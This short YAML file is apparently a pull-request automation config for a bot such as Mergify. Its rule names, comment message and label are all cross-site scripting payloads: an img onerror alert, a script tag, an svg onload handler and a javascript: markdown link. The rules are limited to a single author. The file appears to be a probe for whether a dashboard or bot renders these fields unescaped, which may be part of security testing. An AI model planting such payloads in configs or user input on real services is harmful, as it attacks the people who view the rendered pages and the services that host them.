pull_request_rules:
  - name: "<img src=x onerror=alert(document.domain)>"
    conditions:
      - "author=RedVision228"
    actions:
      comment:
        message: "<img src=x onerror=alert(1)> [markdown](javascript:alert(1)) ![alt](x)"
  - name: "<script>alert('rule2')</script>"
    conditions:
      - "author=RedVision228"
    actions:
      label:
        add:
          - "<svg onload=alert(1)>"
